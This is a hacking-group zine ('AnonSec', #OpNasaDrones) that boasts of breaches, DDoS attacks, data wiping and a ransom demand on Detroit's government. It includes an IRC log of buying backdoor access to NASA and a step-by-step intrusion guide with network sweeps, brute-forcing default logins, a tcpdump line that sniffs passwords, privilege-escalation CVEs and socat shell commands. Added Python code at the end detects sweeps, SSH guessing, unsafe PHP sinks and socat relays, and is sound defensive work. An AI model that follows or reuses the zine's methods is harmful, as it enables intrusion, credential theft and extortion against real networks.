-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Version: OpNasaDrones
pub 4096R/4AAE63E0 2015-10-01
Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0
uid AnonSec (Nihil Verum Est Omnia Licita) <An0nsec@protonmail.ch>
[ASCII art: "ANONSEC" banner]
4c 61 75 67 68 69 6e 67 41 74 59 6f 75 72 53 65 63 75 72 69 74 79 53 69 6e 63 65 32 30 31 32
(hex for "LaughingAtYourSecuritySince2012")
[ASCII art image rendered in dots and dashes; not recoverable from the extracted text]
#AnonSec
/dev/null before dishonour
BEWARE OF RANTS, RICKTROLLING AND ROOTKITS

+------------------------------------+
|         Table of Contents          |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| 0x00 - Preface                     |
| 0x01 - FLASH FROM THE PAST         |
| 0x02 - TTP(Tech/Tac/Pro)           |
| 0x03 - NASA Missions&Aircraft      |
| 0x04 - Chemtrails/CS/GE/WM         |
| 0x05 - WHATS A ROOTKIT?            |
| 0x06 - Russian Roulette            |
| 0x07 - Epilogue                    |
+------------------------------------+
[ASCII art: cat and stars beside the table]
> 0x00 - Preface
"Look, the people you are after are the people you depend on. We cook your meals,
we haul your trash, we connect your calls, we drive your ambulances. We guard you
while you sleep. DO NOT... FUCK WITH US."
Well here we are, it's 2015/2016 and shit has gotten weird... like "No more secrets Marty" weird.
But if there is one thing our team has learned over the past years, it's that no one has
impermeable OpSec, not even the NSA or GCHQ, e.g. Snowden leaks, ICWATCH, NSA Playset, etc...
Basically, people will ALWAYS be the biggest vulnerability in any networked system.
With that being said, we want to take the time to thank all baby boomer secretaries
world-wide, without your lack of training and irresistible urge to open attachments in
spoofed emails from the HR department, this would have never happened lol // Gozi ftw ᕙ༼ ,,ԾܫԾ,, ༽ᕗ
+==================================================================================+
[ASCII art: road sign reading "NO SKIDS ALLOWED BEYOND THIS POINT"]
For those who don't know us, AnonSec was created in Nov 2011 by MrLele (a former AnonGhost admin,
now Peshmerga sniper) and AnonSec666 (US python programmer). Since our start with two members from
Kurdistan and the USA, we have come a long way, adding members and associates from the UK, Germany,
Japan, Malaysia, Morocco, Indonesia, India, Pakistan, Iraq, Italy, Romania and even Latvia. //shouts to CWA, LizardSquad & TeaMp0isoN || rip alg0d
Here are just a few Operations we either started or were heavily involved in...
==> #OpNasaDrones == hacked NASA's drone servers and exfiltrated mission data; vid/data logs [possibly prove existence of Chemtrails and their global warming effect (also their bad OpSec of course)]
e.g. - http://anonhq.com/anonsec-hacked-drone/
- https://www.cyberguerrilla.org/blog/anonymous-operation-nasa-drones-anonsec/
- http://cyberwarzone.com/anonsec-hackers-claim-hacked-nasa-drones/
==> #OpBeast/OpNullDenmark == after DDoSing, defacing or rm -rf / 100's of bestiality sites, Denmark finally changed their laws
- http://www.mirror.co.uk/news/technology-science/technology/anti-bestiality-hackers-target-vile-dog-5310038
- http://www.techworm.net/2015/04/anonymous-launch-opbeast-against-animal-cruelty-and-depravity.html
- http://www.bbc.co.uk/newsbeat/article/32411241/denmark-passes-law-to-ban-bestiality
==> #OpDetroit == DDoS servers over Detroit water shutoffs; also seized a Detroit govt DB and demanded BTC ransom
- http://www.rt.com/usa/206663-detroit-bitcoin-ransom-database/ // they never mentioned AnonSec even tho a member was v& over it *sigh*
- http://www.techworm.net/2014/11/hackers-encrypted-entire-city-detroit-database-demanded-ransom-2000-bitcoins-803500.html
- http://pastebin.com/raw.php?i=fc5s029B
- http://www.usatoday.com/story/news/nation/2014/08/04/detroit-water-shutoffs/13584027/ // Detroit suspended water shutoffs until August 25th, 1 day after we demanded
==> #OpIsrael == once a year we join in the chaos of fucking raping Israeli cyberspace in protest of the current apartheid #FreePalestine
- https://en.wikipedia.org/wiki/OpIsrael
- https://www.rt.com/news/opisrael-anonymous-final-warning-448/
- https://www.rt.com/news/anonymous-israel-cyber-attack-737/
- https://www.youtube.com/watch?v=Uxy57ofajwE
- https://www.youtube.com/watch?v=uskOcl0OHwY
- https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/anonsec-allegedly-hacks-israel-defense-forces-military-preparatory-school-in-support-of-palestine.html
==> #OpISIS/#OpTerror4ISIS == worked with GhostSec to take down thousands of ISIS twitter accs, websites and forums
- http://www.techworm.net/2015/04/opisis-anonymous-release-list-of-70-pro-isis-websites-and-14000-of-twitter-ids.html
- http://cyberwarzone.com/anonsec-declares-war-isis-opterror4isis/
- https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/site-1-20-15-anonsec-announces-operation-terror-4-isis-releases-terrorist-group-government-target-list.html
==> #OpDeathEaters == Expose a UK Paedophilia network being protected by the political elite
- http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11363303/Anonymous-hackers-turn-fire-on-global-paedophile-menace.html
- http://www.dailydot.com/politics/operation-death-eaters-opdeatheaters-anonymous-pedosadism-prince-andrew/
- http://www.ibtimes.co.uk/opdeatheaters-anonymous-marches-planned-across-uk-us-highlight-global-network-child-abusers-1487867
==> After hacking the Windsor University School of Medicine & leaking DBs, we deleted +$9,000,000 in student loan debt instead of phishing students ^_^
- https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/windsor-university-school-of-medicine-allegedly-hacked-student-database-leaked.html
- https://twitter.com/_d3f4ult/status/651290005793472512
==> And tons of others that were rekt for various reasons
- https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&tagId=658&Itemid=1355
- https://twitter.com/search?q=%40VaraCyber%20Anonsec&src=typd
- http://belsec.skynetblogs.be/archive/2014/11/04/70-000-bitcoin-access-accounts-hacked-at-btc-e-com-and-sold-8318769.html
- http://www.bitdefender.com/security/anonsec-hacking-group-breaches-720-random-sites-worldwide;-mocks-lax-security.html
- http://thecryptosphere.com/2014/10/08/anonsec-hackers-tangodown-turkish-e-commerce-sites/
- http://www.eduicon.com/News/Details/3485.html
- http://www.tech.com.pk/2014/01/720-websites-hacked-and-defaced-by.html
- http://www.meethackers.com/2014/04/mcdonalds-id-leaked-by-anonsec-hackers.html
- http://pastebin.com/qYUeCzNJ
- http://pancasilacyberteam.blogspot.sg/2014/04/1381-email-dibocorkan-oleh-anonsec-dan.html
- http://www.wired.com/2015/11/cia-email-hackers-return-with-major-law-enforcement-breach/
- http://zone-h.org/archive/notifier=AnonSec
Since our inception we have certainly had our 'ups&downs' as you could say, from a core member
getting v&, @MrLele1337 going afk to fight ISIS irl and some even becoming whitehats at tech
companies (Pr3dat0r). However, we are still here laughing at 'security', exposing feds online
& fucking everyone's databases... long dick style (•_•) ( •_•)>⌐■-■ (⌐■_■)
On a more serious note, this is AnonSec's very first zine!
So grab some popcorn and let's get this blood orgy started...
[ASCII art: laptop showing a terminal with the prompt `root@onion.land:~# irssi`]
+==================================================================================+
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+==================================================================================+
> 0x01 - FLASH FROM THE PAST
Let's take time to appreciate how this all started 2 years ago...
[ASCII art: starry sky]
...Long ago in an IRC far, far away.......
$# /join #64616e74657320696e6665726e6f 4c696d626f
(3:24) == Shimo7even [root@onion.land] has joined #64616e74657320696e6665726e6f
(3:24) -REDACTED- : Finally....
(3:24) * -REDACTED- glares at Shimo7even for being late
(3:25) Shimo7even : br00te told me DA willing to sell access?
(3:25) 鬼佬 : yes, NASA still
(3:26) -REDACTED- : Nothing interesting on this server but it would serve as a good foothold in the network
(3:27) Shimo7even : im listening
(3:27) 鬼佬 : we held several nets for Miami before v&
(3:27) 鬼佬 : we injected our own malware
(3:28) -REDACTED- : correct
(3:29) 鬼佬 : we have no idea who else they gave access to
(3:29) 鬼佬 : did +10,000 bot kills just to be safe
(3:29) pangeran : hhhhhhhhhhhhh that's funny XD XD
(3:30) Bashtien : so how much you guys want?
(3:30) 鬼佬 : -REDACTED-
(3:31) -REDACTED- : So, still think you can afford our services?
(3:31) pangeran : ^^^^^^ hhhhhhhhhhhhhhhhhhh ^^^^^
(3:31) Shimo7even : Afford? That's rich
(3:32) Shimo7even : LoLing@You -REDACTED-
(3:33) Sh1n0d4 : play nice..
(3:34) Bashtien : -REDACTED- we have been sitting on a ton BTC-E accs for a while now..
(3:34) Bashtien : so crypto funds are no problem m8
(3:35) хуй : ^^
(3:35) d3f4ult : We will even tumble the coins multiple times, so they are 100% clean
(3:35) TGab : Those poor Cossaks, ha
(3:37) Shimo7even : BTC or LTC?
(3:37) 鬼佬 : btc
(3:38) 鬼佬 : https://anonfiles.com/file/-REDACTED-REDACTED-REDACTED-REDACTED-
(3:39) Bashtien : cant read the url in the screenshot..
(3:41) -REDACTED- : thats a decoy.. open it in a hex editor, there is a url to a zip containing a txt file with the real backdoor url
(3:41) Sh1n0d4 : that OpSec though lol
(3:43) * TGab crunches popcorn
(3:45) Bashtien : pass?
(3:45) 鬼佬 : 547265616368657279 for both the zip and shell
(3:46) d3f4ult : fuhosin ^_^
(3:49) * Bastien starts a slow clap
(3:50) * TGab drops popcorn all over the floor
(3:50) d3f4ult : Awww, was hoping it was rooted :(
(3:50) -REDACTED- : No but we fingerprinted many outdated systems in the network
(3:51) pangeran : wkwkwkwkwkwkw!!! DA ftw \(^_^)/
(3:51) Sh1n0d4 : well thats good enough for me, wbu shimo?
(3:53) Shimo7even : !sendbtc -REDACTED- -REDACTED-REDACTED-REDACTED-REDACTED-
(3:53) Sh1n0d4 : Well thats a yes haha
(3:53) == ゴールド [~ゴールド@co.in] has joined #64616e74657320696e6665726e6f
(3:53) ゴールド : https://blockchain.info/address/-REDACTED-REDACTED-REDACTED-REDACTED-
(3:54) ゴールド : sent
(3:55) == ゴールド [~ゴールド@co.in] has quit [Client Quit]
(3:55) -REDACTED- : Pleasure doing business, until next time.
(3:55) 鬼佬 : thank you :)
(3:56) == 鬼佬 [龙@58.87.127.147] has quit [Client Quit]
[>Disclaimer: Certain information was -REDACTED- due to privacy concerns or by request.]
+==================================================================================+
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+==================================================================================+
~~~==+ THE WORLD IS CORRUPT, DON'T BE SHEEP TO THE SLAUGHTER +==~~~
SURVIVE | CONTEMPLATE | INNOVATE
> 0x02 - TTP(Techniques, Tactics & Procedures)
So yeah, we know what you're thinking, hacking NASA? How fucking cliche...
If only I had a Dogecoin for every time someone claimed that, amiright?
It's like the boy who cried wolf but with hacking NASA instead lol
But you might be surprised how low govt security standards can be, especially with a limited
budget and clueless boomers controlling the network. NASA has been breached more times than
most people can honestly remember (our favorites were Gary McKinnon && Mendax's milw0rm)
// you know, when people used to have legit reasons for their hacks^^
Reasons from searching for hidden evidence of UFO technology to protesting use of Uranium based rocket fuel ^_^
"What the Fuck gives you freedom,
freedom brings opportunity,
opportunity makes your future"
However, this hack into NASA wasn't initially focused on drone data and upper atmosphere chemical samples.
In fact the original breach into NASA systems wasn't even planned; it was caught up in a Gozi virus spread.
After purchasing our initial foothold, we were just seeing how many machines we could break into, root
and possibly find interesting/profitable data. So Bashtien contacted Dr.d3v1l, an Italian hacker who had recently
hacked and defaced several NASA subdomains. They provided much insight into the common CMSs NASA uses as
well as potential weak spots in their networks.
Since our first shell in NASA systems only had user account privs, we were fairly limited as to what
dirs we could access, what commands we could run and which other machines/devices on the network were
visible to us. Getting root access on this box would be ideal, so that's what we went for.
Unfortunately, this box was running the latest version of Debian and didn't have any (public) local root CVEs,
and we failed to spear phish the root passwd... luckily MA saved the day with his 2014 bypasses & symlink exploits.
With this we were able to simulate root in a new Linux directory and run any command. This allowed us to move tools/utils/modules
(get-pip.py/eggs)/0days to the box as needed [see scp_tools.txt]. scp_tools.txt contains a list of some of the TTPs that were
used to accomplish these hacks; it's best to make a couple of shell scripts for much quicker downloads (scp_tools.sh).
>cat scp_tools.txt
~ Map Network ~
nast -m
reverse-ip lookups
whois & reverse-whois
dirbuster
[MapNet]
~ Scan Ports/Fingerprint/Enumerate ~
unicornscan && onetwopunch.sh
Nmap NSE - NFS - SMB
LinEnum.sh
linuxprivchecker.py
fierce.pl
Bluto
dnswalk
Network Miner
~ Vuln Scanner ~
Linux_Exploit_Suggester.pl
unix-privesc-check
nikto.pl
wpscan.rb
joomscan.pl
uniscan
wapiti
w3af
nipper
~ Bruteforce ~
hydra w/ passwd lists
~ 0days ~
Mauritania Attackers 2014 bypasses & r00t Symlink Exploits
CVE-2013-5065
CVE-2014-0038
WD My Book World Edition SSH root remote enable
~ Packet Capture/Sniffers/Recovery ~
wireshark
tcpdump
dsniff
mimikatz
egrep
// special thanks to Mauritania Attacker for his bypasses & symlink exploit ^_^
"Assume every network you're on is malicious"
- Samy Kamkar
*Mapping a network can be accomplished a million different ways, depending on the type of box your foothold is on.
By that we mean: what OS is it, what utils and dependencies does it have already installed, what privileges do
you have, are there any IP restrictions? Once we had a symlinked r00t directory filled with tools, the
real fun began... we started mapping their network.
+=========================================================================+
| Our General Steps for Mapping & Propagating Laterally Through a Network |
+=========================================================================+
1) Once we had access to a box in the network..
[MapNet] Here are just a few simple commands to scan active nodes within a network:
arp
nast -m
ip neigh
AngryIpScanner (has GUI)
arp-scan -l -I eth0
ping -b 192.168.1.255
smbtree -NS 2>/dev/null
nbtscan 192.168.1.1-255
fping -a -g 192.168.1.0/24 2> /dev/null
nmap -sP 192.168.1.0/24 or nmap -sn 192.168.1.0/24
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
2) Next, to get a broader view of their entire network, we started probing whois and reverse-whois lookups on the IP
addresses and domain names we found, as well as registrar info (ex. "222 S Mill Avenue" inurl:domaintools). Also
running Bluto & fierce.pl to find IP leaks via DNS zone transfers. If scans are fruitful with new hosts found, repeat
steps 1&2 on the new addresses. Do this until you can't find any more hosts.
3) Once we started seeing other connected nodes on the same LAN, it was time to run some port scans and do some
passive OS/BIOS fingerprinting. (unicornscan && onetwopunch.sh or nmap NSE scripts come in handy here)
4) After mapping some nodes, scanning ports and fingerprinting, we started looking up CVEs for the different versions
of operating systems and the various services running. (Linux_Exploit_Suggester.pl, unix-privesc-check, nikto.pl,
uniscan and CobaltStrike are the best for automating this process)
5) Any system running RDP/VNC/SSH/MYSQL should always be bruteforced because it's common for administrators to either
leave the default login or to use an extremely common passwd.
> ALWAYS -e nsr WHEN BRUTEFORCING <
+-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
|I|n| |C|o|m|m|o|n|l|y| |u|s|e|d| |P|a|s|s|w|o|r|d|s| |W|e| |T|r|u|s|t|
+-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
[22][ssh] login: root password: root
1 of 1 target successfully completed, 1 valid password found in 0.32s
6)* If the site is being used as a public server or for any type of database storage, it will most likely have a
CMS (content management system) with a cpanel. So try running cmsmap.py, wpscan.rb or joomscan.pl.
7)* If the server has any kind of web application on it, try running wapiti and w3af.
8)* If there are any firewalls, switches or routers found in the network, try running nipper (SonicWALL lol).
9) Scanners are great for those of us who are either busy or lazy, but they also tend to generate a lot of false positive results. One of the most important steps is to use something like dirbuster and manually browse the source of various .xml, .js, .php and php.in files for SQLi,
XSS, LFI, RFI, FPD, HostHeaderAttacks etc [this requires decent programming and exploitation knowledge to spot possible configuration errors, insecure functions or unsanitized inputs, i.e. _SERVER["HTTP_HOST"], unserialize(), popen(), strcmp(), exec(), system(), shell_exec(), escapeshellcmd(), passthru(), create_function(), pcntl_exec(), eval() & many many more!]
Here is an example of NASA SQLi and XSS vulnerabilities:
SQLi: http://prntscr.com/9hekve
XSS: http://prntscr.com/9kkc8r && http://prntscr.com/9kkcnf
10)* If that comes up with nothing then it's either brute forcing a login, spear phishing a login with XSS or SEing a login or passwd reset. (hacked VPSs/RDPs, proxies, hydra+wordlists && some burner sims/phones or VoIP servers or hacked Skype accs are a definite must have for this)
11) Always target the most vulnerable nodes first (minus false positives). //They have many WinXP & unpatched Ubuntu servers btw
- WinXP Local SYSTEM privilege escalation: CVE-2013-5065
- Ubuntu Local root exploit: CVE-2014-0038
12) Every time we gained access to a new box we always left a packet sniffer running to hopefully get some http/ftp/smtp/imap/pop3 logins:
tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
ngrep -q -W byline "GET|POST HTTP"
dsniff -m
\!/ ALWaYS RUN SC4NS oN N3W BOXes FOR MORE NoDES \!/
13) Pivoting is great for all kinds of things like bypassing firewalls & getting reverse shells w/ a statically linked copy of socat to drop on target:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
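Seen from the other side of the wire, steps 1, 2 and 5 above leave two very recognisable traces: a host-discovery sweep (`ping -b`, `fping -g`, `nmap -sn`, the ping for-loop) is one source touching dozens of distinct destinations within seconds, and `hydra -e nsr` style guessing is a burst of `Failed password` lines in sshd's auth log from one source, sometimes followed by an `Accepted password` for the same account. The Python below is an added example written for this page, not code from the zine or from AnonSec. The flow-log format it parses is a hypothetical one constructed for the example; the sshd lines follow OpenSSH's real log format but are constructed; the window and threshold values are assumptions to tune per network.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# --- Constructed sample data (no real NASA or AnonSec data) -------------------

def constructed_flow_log():
    """Flow records in a hypothetical '<ISO time> proto=.. src=.. dst=..' format.
    One source (192.168.1.50) reaches .1 through .40 inside four seconds, the
    shape of fping -g / nmap -sn / the ping for-loop; .77 is ordinary traffic."""
    lines = [f"2015-12-01T03:24:{5 + i // 10:02d} proto=icmp src=192.168.1.50 dst=192.168.1.{i}"
             for i in range(1, 41)]
    lines += ["2015-12-01T03:25:00 proto=tcp src=192.168.1.77 dst=192.168.1.10",
              "2015-12-01T03:25:30 proto=tcp src=192.168.1.77 dst=192.168.1.20"]
    return lines

# OpenSSH auth-log lines, constructed: five quick failures from .50 (root and an
# invalid user) ending in a success, then one ordinary typo from .77.
AUTH_LOG = """\
Dec  1 03:30:01 web01 sshd[2201]: Failed password for root from 192.168.1.50 port 51234 ssh2
Dec  1 03:30:01 web01 sshd[2203]: Failed password for invalid user admin from 192.168.1.50 port 51235 ssh2
Dec  1 03:30:02 web01 sshd[2205]: Failed password for root from 192.168.1.50 port 51236 ssh2
Dec  1 03:30:02 web01 sshd[2207]: Failed password for root from 192.168.1.50 port 51237 ssh2
Dec  1 03:30:03 web01 sshd[2209]: Failed password for root from 192.168.1.50 port 51238 ssh2
Dec  1 03:30:03 web01 sshd[2211]: Accepted password for root from 192.168.1.50 port 51239 ssh2
Dec  1 03:31:10 web01 sshd[2250]: Failed password for alice from 192.168.1.77 port 40001 ssh2
Dec  1 03:31:20 web01 sshd[2252]: Accepted password for alice from 192.168.1.77 port 40002 ssh2
"""

FLOW_RE = re.compile(r"^(\S+) proto=(\w+) src=(\S+) dst=(\S+)$")
SSH_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")


def detect_sweeps(lines, window_s=10, min_hosts=16):
    """Return {src: distinct_destinations} for every source that reaches at
    least min_hosts distinct destinations inside some window_s-second window."""
    per_src = defaultdict(list)
    for line in lines:
        m = FLOW_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
            per_src[m.group(3)].append((ts, m.group(4)))
    hits = {}
    for src, events in per_src.items():
        events.sort()
        lo, best = 0, 0
        for hi in range(len(events)):            # sliding window over time-ordered events
            while (events[hi][0] - events[lo][0]).total_seconds() > window_s:
                lo += 1
            best = max(best, len({dst for _, dst in events[lo:hi + 1]}))
        if best >= min_hosts:
            hits[src] = best
    return hits


def detect_ssh_guessing(lines, window_s=60, threshold=5, year=2015):
    """Flag sources with >= threshold failed passwords inside window_s seconds
    (syslog lines carry no year, so one is supplied) and report any later
    Accepted login from a flagged source: the 'root/root found' outcome."""
    failures = defaultdict(deque)
    flagged, success_after_guessing = {}, []
    for line in lines:
        m = SSH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, src = m.group(2), m.group(3), m.group(4)
        if outcome == "Failed":
            recent = failures[src]
            recent.append(ts)
            while (ts - recent[0]).total_seconds() > window_s:
                recent.popleft()                 # drop failures outside the window
            if len(recent) >= threshold:
                flagged[src] = max(flagged.get(src, 0), len(recent))
        elif src in flagged:
            success_after_guessing.append((src, user))
    return {"flagged": flagged, "success_after_guessing": success_after_guessing}


if __name__ == "__main__":
    print("sweeps:", detect_sweeps(constructed_flow_log()))
    print("ssh:", detect_ssh_guessing(AUTH_LOG.splitlines()))
```

The second detector is the one worth wiring to an alert: a success that follows a flagged burst is exactly the `login: root password: root` result shown above, and the fix on the host side is `PermitRootLogin no` plus key-only authentication in `sshd_config` rather than a bigger threshold.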
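Step 9's manual source review (spotting `eval()`, `system()`, `unserialize()`, `strcmp()` and the `HTTP_HOST` header used unsafely) is the kind of thing a defender automates as a first pass before a human reads the hits. The Python below is an added example for this page, not the zine's tooling and not a real scanner: it flags the sinks step 9 names plus the `include`/`require` family behind LFI/RFI, tracks taint crudely within one file (a variable assigned from a superglobal, or from another tainted variable, stays tainted), and reports the two PHP-specific pitfalls step 9 mentions. The PHP fragment it scans is constructed for the example and is not code from any real site.

```python
import re

# Sinks named in step 9 (eval, system, exec, shell_exec, passthru, popen,
# pcntl_exec, create_function, unserialize) plus the include family behind
# LFI/RFI. Everything here is an added example, not the zine's own tooling.
SINKS = ["eval", "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
         "pcntl_exec", "create_function", "unserialize",
         "include", "include_once", "require", "require_once"]
SINK_RE = re.compile(r"\b(" + "|".join(re.escape(s) for s in SINKS) + r")\s*\(", re.I)
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")
ASSIGN_RE = re.compile(r"^\s*(\$\w+)\s*=[^=]")          # "$var = ..." but not "=="
HOST_HEADER_RE = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]\s*\]")
LOOSE_STRCMP_RE = re.compile(r"strcmp\s*\(.*\)\s*(==|!=)\s*0")   # should be ===


def audit_php(source):
    """Scan PHP source and return (line_no, severity, message) findings.
    HIGH   = sink reached by attacker-controlled data on this line
    MEDIUM = a known PHP pitfall (loose strcmp compare, Host header reuse)
    REVIEW = sink called with something this crude pass cannot classify"""
    findings, tainted = [], set()

    def is_tainted(text):
        return bool(SUPERGLOBAL_RE.search(text)) or any(
            re.search(re.escape(v) + r"\b", text) for v in tainted)

    for n, line in enumerate(source.splitlines(), 1):
        if line.strip().startswith(("//", "#", "/*", "*")):
            continue                                   # skip comment-only lines
        m = ASSIGN_RE.match(line)
        if m and is_tainted(line):
            tainted.add(m.group(1))                    # propagate taint to the new variable
        for s in SINK_RE.finditer(line):
            sev = "HIGH" if is_tainted(line) else "REVIEW"
            detail = " with attacker-controlled input" if sev == "HIGH" else "; check its argument"
            findings.append((n, sev, f"{s.group(1).lower()}() called{detail}"))
        if HOST_HEADER_RE.search(line):
            findings.append((n, "MEDIUM", "$_SERVER['HTTP_HOST'] used; the Host header is client-supplied"))
        if LOOSE_STRCMP_RE.search(line):
            findings.append((n, "MEDIUM", "strcmp() result compared with ==/!=; use === (type juggling)"))
    return findings


# Constructed PHP fragment exercising each check; not code from any real site.
SAMPLE_PHP = """<?php
// constructed sample for this example
$page = $_GET['page'];
include("pages/" . $page . ".php");                 // LFI via tainted $page
$out = shell_exec("ping -c 1 " . $_POST['host']);   // command injection
$data = unserialize($_COOKIE['prefs']);             // object injection
$reset = "https://" . $_SERVER['HTTP_HOST'] . "/reset?t=" . $token;
if (strcmp($_POST['pw'], $stored) == 0) { grant(); }
$up = system("uptime");                             // constant argument: review only
echo htmlspecialchars($page);
"""

if __name__ == "__main__":
    for line_no, severity, message in audit_php(SAMPLE_PHP):
        print(f"{line_no:3d} {severity:7s} {message}")
```

Line 4 is the instructive case: the superglobal is on line 3, so a plain `grep` for sinks next to `$_GET` would rate it the same as line 9's `system("uptime")`; the per-variable taint set is what separates them. The pass is deliberately file-local and regex-based, so it will miss taint that crosses functions or files and will over-report sinks fed by properly validated data; that is the human reviewer's share of step 9.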
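The socat relay in step 13 is, from the owner's side of the box, just a process with an unusual command line and a listening socket owned by a binary that should not be listening. The Python below is an added example for this page, not the zine's code: it parses `ss -ltnp`-style and `ps -eo pid,user,args`-style output, reports listeners whose owning process is not on a per-port allowlist, flags command lines with the `socat exec:…sh… tcp-listen:/tcp-connect:` shape, and joins the two views by PID. Both outputs are constructed for the example and the allowlist is a hypothetical one for the example host.

```python
import re

# Constructed `ss -ltnp` output (listening TCP sockets with owning process);
# not taken from any real host. Added example, not the zine's own code.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80         0.0.0.0:*         users:(("apache2",pid=1201,fd=4))
LISTEN 0      5      0.0.0.0:4444       0.0.0.0:*         users:(("socat",pid=31337,fd=5))
LISTEN 0      128    127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=990,fd=21))
"""

# Constructed `ps -eo pid,user,args` output for the same host.
PS_OUTPUT = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1201 www-data /usr/sbin/apache2 -k start
31337 www-data socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:4444
  990 mysql    /usr/sbin/mysqld
"""

# Hypothetical allowlist: which binaries may own which listening ports here.
EXPECTED_LISTENERS = {22: {"sshd"}, 80: {"apache2"}, 3306: {"mysqld"}}

SS_RE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')
PS_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*)$")
# The step-13 shape: socat with an exec: address that spawns a shell, paired
# with a tcp-listen: or tcp-connect: address.
SHELL_RELAY_RE = re.compile(r"\bsocat\b.*exec:\S*(sh|bash).*tcp-(listen|connect):")


def unexpected_listeners(ss_text, expected=EXPECTED_LISTENERS):
    """Listening sockets whose owning process is not allowlisted for that port."""
    out = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if not m:
            continue                                   # header or non-LISTEN line
        addr, port, proc, pid = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
        if proc not in expected.get(port, set()):
            out.append({"port": port, "addr": addr, "process": proc, "pid": pid})
    return out


def shell_relays(ps_text):
    """Processes whose command line looks like the socat relay in step 13."""
    out = []
    for line in ps_text.splitlines():
        m = PS_RE.match(line)
        if m and SHELL_RELAY_RE.search(m.group(3)):
            out.append({"pid": int(m.group(1)), "user": m.group(2), "cmd": m.group(3)})
    return out


def correlate(ss_text, ps_text):
    """High-confidence hits: an unexpected listener owned by a relay-shaped process."""
    relay_pids = {r["pid"] for r in shell_relays(ps_text)}
    return [l for l in unexpected_listeners(ss_text) if l["pid"] in relay_pids]


if __name__ == "__main__":
    print("unexpected listeners:", unexpected_listeners(SS_OUTPUT))
    print("relay-shaped processes:", shell_relays(PS_OUTPUT))
    print("correlated:", correlate(SS_OUTPUT, PS_OUTPUT))
```

Two details carry most of the signal in practice: the relay runs as the web server's user (`www-data` here), which is where a web-application foothold lands, and an allowlist keyed by port catches the listener even when the binary has been renamed, since a renamed socat still is not `sshd` on port 22. The reverse-connect variant (`tcp-connect:` back out to the attacker) leaves no listener, which is why the process-shape check is kept separate from the socket check rather than folded into it.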